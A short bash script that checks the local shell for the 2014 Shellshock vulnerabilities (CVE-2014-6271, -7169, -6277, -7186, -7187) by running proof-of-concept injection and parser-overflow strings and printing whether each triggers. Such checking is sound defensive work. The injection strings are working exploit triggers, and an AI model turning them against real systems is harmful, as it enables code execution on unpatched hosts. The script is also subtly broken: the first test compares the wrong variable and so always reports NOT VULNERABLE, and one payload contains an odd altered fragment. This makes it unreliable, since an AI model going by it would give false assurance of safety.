bashtest.sh

echo "Testing Exploit 1 (CVE-2014-6271)"
CVE6271="$(env x='() { :;}; echo -n V' bash -c : 2>/dev/null)"
[ "${CVE7187}" == "V" ] && echo "VULNERABLE" || echo "NOT VULNERABLE"

echo "Testing Exploit 2 (CVE-2014-7169)"
CVE7169="$(env X='() { (4lpi.com)=>\' bash -c "echo date" 2>/dev/null; cat echo 2>/dev/null; rm -f echo)"
[ ! "${CVE7169}" == "date" ] && echo "VULNERABLE" || echo "NOT VULNERABLE"

echo "Testing Exploit 3 (CVE-2014-6277)"
CVE6277="$(env -i X=' () { }; echo -n V' bash -c :)"
[ "${CVE6277}" == "V" ] && echo "VULNERABLE" || echo "NOT VULNERABLE"

echo "Testing Exploit 4 (CVE-2014-7186)"
CVE7186="$(bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' 2>/dev/null ||echo -n V)"
[ "${CVE7186}" == "V" ] && echo "VULNERABLE" || echo "NOT VULNERABLE"

echo "Testing Exploit 5 (CVE-2014-7187)"
CVE7187="$((for x in {1..200}; do echo "for x$x in ; do :"; done; for x in {1..200}; do echo done; done) |bash 2>/dev/null ||echo -n V)"
[ "${CVE7187}" == "V" ] && echo "VULNERABLE" || echo "NOT VULNERABLE"